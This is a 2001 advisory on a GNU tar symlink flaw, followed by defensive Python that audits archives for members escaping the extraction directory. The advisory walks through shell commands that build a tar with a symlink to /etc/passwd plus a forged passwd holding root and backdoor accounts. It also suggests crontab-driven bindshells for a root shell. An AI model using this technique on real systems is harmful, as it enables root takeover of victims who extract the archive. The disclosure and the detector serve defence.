Title        : GNU tar (Tape ARchive) symlink vulnerability
Author       : Marco van Berkum
Organisation : OBIT b.v.
URL          : http://www.obit.nl
Email        : m.v.berkum@obit.nl
Date         : 06-01-2001

The useful program tar (Tape ARchive) ships with all UNIX, Linux and BSD versions and is used to ARCHIVE files to disk or tape in an easy, portable format. While this program has been used for a long time, there seemed to be no need to fix the problem of following symlinks in an archive. The problem is that tar follows symlinks without questioning whether the target is a harmless file or a file such as /etc/passwd. This way it is possible to overwrite ANY file on the system when the archive is untarred as root (NOT DONE).

How can this be done? Well, you create a directory as a test to see the effect of a tarred symlink:

% mkdir test
% cd test
% ln -s /etc/passwd passwd
% ls -al
total 2
drwx--x--x   2 user     user         1024 Aug  7 13:08 ./
drwxr-xr-x  27 user     user         1024 Aug  7 13:08 ../
lrwxrwxrwx   1 user     user           11 Aug  7 13:08 passwd -> /etc/passwd
%

You now have a symlink to /etc/passwd; next we are going to tar this symlink.

% tar -cvf test.tar *
% ls -al
total 12
drwx--x--x   2 user     user         1024 Aug  7 13:11 ./
drwxr-xr-x  27 user     user         1024 Aug  7 13:08 ../
lrwxrwxrwx   1 user     user           11 Aug  7 13:08 passwd -> /etc/passwd
-rw-------   1 user     user        10240 Aug  7 13:11 test.tar
%

Let's see what's in the tarfile now:

% tar -tf test.tar
passwd          <- AHA a symlink ;)
%

This is not visible as a symlink when you do -tf !! It would be when doing tar -tvf (verbose). So next we remove the symlink from the test directory:

% rm passwd

We now have only the tarfile with the symlink to /etc/passwd; next we create our own passwd file:

% echo "root:our_password_string:0:0::/root:/bin/bash" >passwd
% echo "hax0r:our_password_string:1000:100::/tmp:/bin/bash" >>passwd

OK, now we have a test.tar and a passwd file; all we would have to do is simply append the password file to the tarfile.

% tar -rf test.tar passwd

Now list it:

% tar -tf test.tar
passwd          <- AHA a symlink ;)
passwd          <- our evil passwd file
%

Now one can imagine what happens when this tarfile is extracted as root: it will create a symlink to /etc/passwd and overwrite it with ours. Of course this is possible with all files on the system; one of the most malicious things to do would be overwriting the root crontab and executing commands that way. Even programs like bindshell can be executed this way, by making a symlink to say /tmp, dumping the bindshell binary/source to /tmp and making a root crontab pointing to that file, executing it or compiling and executing it, which will leave us with a root shell ;)

Solution:

Well, obviously one should NEVER untar files as root, but a patch to the tar program which enhances tar by asking whether it should follow symlinks or not would do the trick as well.

grtz,
Marco van Berkum

--
Sex is like hacking. You get in, you get out, and you hope you didn't leave something behind that can be traced back to you.

Marco van Berkum, System Operator/Security Analyst
OBIT b.v.
RIPEHANDLE: MB17300-RIPE
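As an added defender-side example (not part of the advisory above), the Python below rebuilds the walkthrough's test.tar in memory and audits an archive for the pattern described before anyone extracts it: a member whose path or link target escapes the extraction directory, or a member whose path equals or passes through a symlink that appeared earlier in the same archive. The member names and target are the advisory's; the function names and the sample archive are constructed for this example.

```python
import io
import posixpath
import tarfile

def build_demo_archive(with_link: bool = True) -> bytes:
    """Constructed sample: the advisory's test.tar built in memory, a symlink
    member 'passwd' -> /etc/passwd followed by a regular 'passwd' member
    (what 'tar -cf' then 'tar -rf' produced above)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        if with_link:
            link = tarfile.TarInfo("passwd")
            link.type = tarfile.SYMTYPE
            link.linkname = "/etc/passwd"
            tar.addfile(link)
        payload = b"root:our_password_string:0:0::/root:/bin/bash\n"
        info = tarfile.TarInfo("passwd")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()

def audit_archive(data: bytes) -> list:
    """Return (member name, reason) pairs for members that could write outside
    the extraction directory: absolute or '..' paths, symlinks pointing out,
    and members written through an earlier symlink (the advisory's case)."""
    findings = []
    links = {}  # normalised member name -> symlink target, in archive order
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tar:
        for m in tar:
            name = posixpath.normpath(m.name)
            if name.startswith("/") or name == ".." or name.startswith("../"):
                findings.append((m.name, "absolute or parent-directory path"))
            if m.issym():
                target = m.linkname
                if target.startswith("/") or ".." in target.split("/"):
                    findings.append((m.name, "symlink escapes extraction dir: " + target))
                links[name] = target
                continue
            # A later member whose path equals or passes through an earlier
            # symlink lands wherever that link points, not in the extraction dir.
            parts = name.split("/")
            for i in range(1, len(parts) + 1):
                prefix = "/".join(parts[:i])
                if prefix in links:
                    findings.append((m.name, "written through symlink %s -> %s" % (prefix, links[prefix])))
                    break
    return findings
```

Run audit_archive() over any archive from an untrusted source before extracting it; an empty list means no member can escape the target directory through these paths or links.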